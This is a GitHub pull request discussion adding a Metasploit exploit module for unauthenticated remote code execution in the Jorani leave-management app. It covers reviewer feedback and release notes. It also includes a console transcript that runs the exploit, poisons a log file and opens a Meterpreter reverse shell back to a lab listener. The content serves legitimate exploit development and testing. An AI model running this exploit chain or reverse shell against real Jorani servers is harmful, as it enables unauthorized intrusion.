Add exploit for unauth RCE Jorani #18123
Conversation
adfoster-r7
added
needs-docs
needs-linting
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
|
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit: You can automate most of these changes with the Please update your branch after these have been made, and reach out if you have any problems. |
There was a problem hiding this comment.
Thanks for the module @Guilhem7! I think this module might benefit using the Command Stagers mixin we have in metasploit. You can read more about the mixin here:
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
Command stagers allow modules that exploit command execution or code injection vulnerabilities to more easily exploit a variety of different payloads. If you have any questions let me know I'd be happy to help you out!
| 'uri' => "#{uri}/session/login" | ||
| ) | ||
|
|
||
| print_status('Recovering CSRF token') |
There was a problem hiding this comment.
Move those lines before the whole poinson_payload/header_name/… dance, since there is no need to execute them before.
|
@jheysel-r7 thanks for the help, however I'm not sure Msf::Exploit::CmdStager will be helpful here as this CVE exploit php code injection and not system injection. It seems like (in the documentation you provided) that it is used for system cmd injection. |
|
@Guilhem7 Fixed up what I could but will need your input on some points. Also awaiting documentation from you for this PR. Please refer to https://docs.metasploit.com/docs/development/get-started/creating-your-first-pr.html#writing-documentation if you need further information on how to do this. |
gwillcox-r7
removed
the
needs-linting
…able. Adding the documentation after checking it with the dev tool
|
|
||
| Log poisonning is possible, so an authenticated attacker can execute arbitrary code. | ||
|
|
||
| Finally, the controller responsible for recovering a page doesn't properly redirect requests made by Ajax. |
There was a problem hiding this comment.
How is this relevant to the exploit? The impact here isn't really explained as to what this allows an attacker to do. For all I know this is just a bug with no real impact. Please explain why this is useful for an attacker and what impact it has on the exploitation process in terms of what it can be used for and how this contributes to a full exploit.
gwillcox-r7
added
the
needs-linting
|
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit: You can automate most of these changes with the Please update your branch after these have been made, and reach out if you have any problems. |
Co-authored-by: Brendan <bwatters@rapid7.com>
Co-authored-by: Brendan <bwatters@rapid7.com>
Co-authored-by: Brendan <bwatters@rapid7.com>
jheysel-r7
removed
the
needs-linting
There was a problem hiding this comment.
Thanks for the module @Guilhem7. I've made some minor changes and tested the module successfully. Looks good 👍
msf6 > use jorani
[*] Using configured payload php/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/php/jorani_path_trav 2023-01-06 excellent Yes Jorani unauthenticated Remote Code Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/php/jorani_path_trav
[*] Using exploit/multi/php/jorani_path_trav
msf6 exploit(multi/php/jorani_path_trav) > options
Module options (exploit/multi/php/jorani_path_trav):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path of Jorani
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Jorani < 1.0.2
View the full module info with the info, or info -d command.
msf6 exploit(multi/php/jorani_path_trav) > set rhosts 172.16.199.158
rhosts => 172.16.199.158
msf6 exploit(multi/php/jorani_path_trav) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/php/jorani_path_trav) > set rport 80
rport => 80
msf6 exploit(multi/php/jorani_path_trav) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/php/jorani_path_trav) > set targeturi jorani
targeturi => jorani
msf6 exploit(multi/php/jorani_path_trav) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Jorani version
[+] Jorani seems to be running on the target!
[+] Found version: 1.0.0
[+] The target appears to be vulnerable.
[*] Trying to exploit LFI
[*] Recovering CSRF token
[+] CSRF found: be7e8205ad5f1fae2834478acdd0b546
[*] Poisoning log with payload..
[*] Sending 1st payload
[*] Including poisoned log file log-2023-08-18.php.
[+] Triggering payload
[*] Sending stage (39927 bytes) to 172.16.199.158
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.158:39624) at 2023-08-18 15:01:55 -0400
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 5.15.0-79-generic #86~20.04.2-Ubuntu SMP Mon Jul 17 23:27:17 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > exit
Release NotesThis PR adds a module that chains together a log poisoning LFI, redirection bypass and a path traversal vulnerability to obtain unauthenticated RCE. |
|
Hey thanks a lot for the merge ! 😄 |
This PR add a new exploit module for an unauthenticated RCE.
Verification
You need to deploy an instance of a vulnerable jorani instance (version <= 1.0.0)
msfconsoleuse exploit/multi/php/jorani_path_traversalset your options...checkrunDemonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to msfdev@metasploit.com. Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the wiki.